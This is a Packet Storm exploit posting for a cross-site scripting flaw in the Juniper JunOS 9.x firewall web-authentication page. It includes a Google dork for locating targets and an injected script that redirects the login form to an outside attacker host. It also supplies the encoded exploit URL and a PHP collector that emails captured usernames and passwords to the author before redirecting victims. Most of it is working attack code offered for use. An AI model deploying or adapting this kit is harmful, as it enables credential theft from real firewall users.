Twenty Year Anniversary

Juniper JunOS 9.x Cross Site Scripting

Juniper JunOS 9.x Cross Site Scripting
Posted Jul 24, 2013
Authored by Andrea Menin

Juniper JunOS version 9.x suffers from a html injection vulnerability that allows for cross site scripting attacks.

tags | exploit, xss
systems | juniper
advisories | CVE-2014-3821
MD5 | 09aec546e2e8fb3a83f2428948e03269

Juniper JunOS 9.x Cross Site Scripting

Change Mirror Download
Exploit Title: Juniper JUNOS 9.X HTML Injection Vulnerability
Google Dork: intext:"2009, Juniper Networks" intext:"Firewall User Web-Authentication"
Date: Jul 24th 2013
Exploit Author: Andrea Menin (linkedin.com/in/andreamenin)
Vendor Homepage: http://www.juniper.net
Version: JUNOS 9.X
Tested on: Firefox 22.0



Description:
------------
The Juniper Firewall has a PHP authentication and authorization
page for using ports and services that usually are not enabled.
The page contains a html form that sends authentication requests
to the following url:

"https:/<ip>/?target=&auth_id=&ap_name="

Looking at this URL we can see that, along with your username
and password, will be sent the variables $target, $auth_id and
$ap_name. The contents of these variables is placed in the
destination URL of the html form ("action" argument), so
injecting HTML code into these variables can change the form,
and you can change the "action" parameters for collect username
and password on external page.



Exploit:
--------
The exploit consists on injecting DOM functions for
replace the "action" parameters into the tag <form>
with an external URL that will collects username
and password used by the users. You can use the
DOM function "setAttribute" for replace the "action"
parameters, like this script:

<script>
var f = document.getElementsByTagName('form')[0];
f.setAttribute('action', 'http://i.am.a.bad.boy.xy/fuck.php');
</script>

Exploit URL:

https://<firewall ip>/?target=&auth_id=&ap_name=%22%3E%3Cscript%3Edocument.getElementsByTagName%28%27form%27%29[0].setAttribute%28%27action%27,%20%27http://i.am.a.bad.boy.xy/fuck.php%27%29%3C/script%3E%3Ca%20href=%22

url-decoded, appears like this:

https://<firewall ip>/?target=&auth_id=&ap_name="><script>document.getElementsByTagName('form')[0].setAttribute('action', 'http://i.am.a.bad.boy.xy/fuck.php')</script><a href="

The PHP script "fuck.php" will receive, via POST http request,
the username and password. I've write this exploit that sends
me an email when a new username and password received, and then
redirect the users to the original firewall's login page.


<?php
// send me your password
mail(
'menin.andrea@gmail.com',
'new juniper password',
"user: ".$_POST['username']."\npass: ".$_POST['password']."\n\n",
"From: Jesus <badboy@holy.crap>\n"
);

// taking user to home
header("Location: https://10.0.0.1");
?>




have fun.

--
Andrea (aka und3r) Menin
menin.andrea [at] gmail.com
linkedin.com/in/andreamenin

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

May 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    17 Files
  • 3
    May 3rd
    30 Files
  • 4
    May 4th
    29 Files
  • 5
    May 5th
    2 Files
  • 6
    May 6th
    3 Files
  • 7
    May 7th
    13 Files
  • 8
    May 8th
    27 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    15 Files
  • 11
    May 11th
    8 Files
  • 12
    May 12th
    2 Files
  • 13
    May 13th
    8 Files
  • 14
    May 14th
    7 Files
  • 15
    May 15th
    43 Files
  • 16
    May 16th
    19 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    3 Files
  • 20
    May 20th
    6 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close